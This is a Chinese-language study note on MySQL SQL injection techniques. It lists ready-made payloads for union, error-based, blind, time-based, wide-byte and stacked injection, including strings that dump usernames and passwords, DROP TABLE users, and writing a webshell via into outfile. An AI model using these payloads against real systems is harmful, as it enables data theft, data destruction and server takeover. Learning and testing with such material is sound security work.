SQL注入（1）

1.原理：用户将恶意SQL语句的参数拼接到动态SQL语句，后端没有进行校验，然后在数据库中执行。

2.分类：

• 联合查询注入
• 报错注入
• 宽字节注入
• 二次注入
• DNSlog注入
• 请求头注入

3.

（1)联合注入查询：union

通过union拼接查询语句获得大量信息，让数据库同时返回原数据 + 你想要的数据。

前提：页面会把查询结果直接展示出来（有回显）

通用步骤：

• 判断字段数（列数）

先猜当前查询有几列：

' ORDER BY 1--+ ' ORDER BY 2--+ ' ORDER BY 3--+ ...

直到报错，就知道列数。

• 判断回显位（哪一列会显示在页面）

用 UNION SELECT 看哪些数字会被打印：

' UNION SELECT 1,2,3--+

页面出现 2，说明第 2 列是回显位。

• 查库名、版本、用户

' UNION SELECT 1,database(),version()--+

• 查表名

' UNION SELECT 1,group_concat(table_name),3 FROM information_schema.tables WHERE table_schema=database()--+

• 查字段名

' UNION SELECT 1,group_concat(column_name),3 FROM information_schema.columns WHERE table_name='users'--+

• 查数据（账号密码）

' UNION SELECT 1,group_concat(username,password),3 FROM users--+

（2)报错注入

让 MySQL 执行过程中故意出错，并把查询结果当成错误信息吐出来。

所以 payload 必须同时满足两件事：

• 能触发报错函数（让数据库抛异常）
• 报错时把我们要的数据带出来

经典payload结构：

1' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT 要查的东西),FLOOR(RAND()*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a) --+

简化：

1' AND UPDATEXML(1,CONCAT(0x7e,(SELECT database()),0x7e),1) --+

（3)布尔盲注

页面不返回数据、也不报错，只能看到 “对 / 错” 两种结果时，用布尔盲注一位一位猜解出数据。

典型payload结构：

1' and substr(database(),1,1)='a' --+

常见变种payload：

• 作用：用 ASCII 码范围判断，更快猜字母

1' and ascii(substr(database(),1,1))>100 --+

• 作用：先猜数据库名长度是几位

1' and length(database())=5 --+

（4）时间盲注

页面既不显示数据，也不报错，连对错都看不出时，靠让数据库 “卡一下” 来判断真假。

• 猜对了 → 让数据库sleep 延迟几秒
• 猜错了 → 数据库立刻返回

典型payload结构：

1' and if(substr(database(),1,1)='a',sleep(5),0) --+

sleep函数被禁用：

不一定非要 sleep(5)，只要能故意拖慢数据库就行。

• BENCHMARK

1' and if(条件, BENCHMARK(10000000,MD5(1)), 0) --+

作用：让 MySQL 重复执行 MD5 (1) 一千万次，强行卡几秒。

• 笛卡尔积耗查询（无函数版）

1' and if(条件, (SELECT count(*) FROM information_schema.tables A,information_schema.tables B), 0) --+

作用：大表联表查询，数据量爆炸，页面明显变慢。

• GET_LOCK 锁表延时

1' and if(条件, GET_LOCK('abc',3), 0) --+

作用：申请一个锁，等待 3 秒，实现延时。

• 运算延时

1' and if(条件, SHA1(sha1(sha1(1))), 0) --+

多层嵌套加密，也能轻微延时。

（5)宽字节注入

绕过 PHP 的 addslashes / 转义，把防御加的反斜杠 \ 吃掉，从而闭合单引号。

前提：数据库编码是 GBK / GB2312

原理：
PHP 加的反斜杠是：%5c
你输入一个字符：%df
组合起来：%df%5c
在 GBK 里，%df%5c 会被当成一个汉字 “運”

典型payload结构：

1%df' union select 1,2#

（6）堆叠注入

一次性执行多条 SQL 语句

正常注入只能在原语句里拼接逻辑（and /or/union）。
堆叠注入可以：
用；结束当前语句，再写一条全新的 SQL 一起执行。

例：

1'; DROP TABLE users; --+ 1'; SHOW DATABASES; --+

典型payload结构：

1'; payload; --+

新 SQL 语句可以是任意操作：

• show databases;
• show tables;
• select * from users;
• load_file('/flag');
• into outfile... 写马

堆叠注入能干什么？

• 查库、查表、查字段
• 读取服务器文件（load_file）
• 写入 webshell（into outfile）
• 创建用户、赋权限
• 删除表（drop）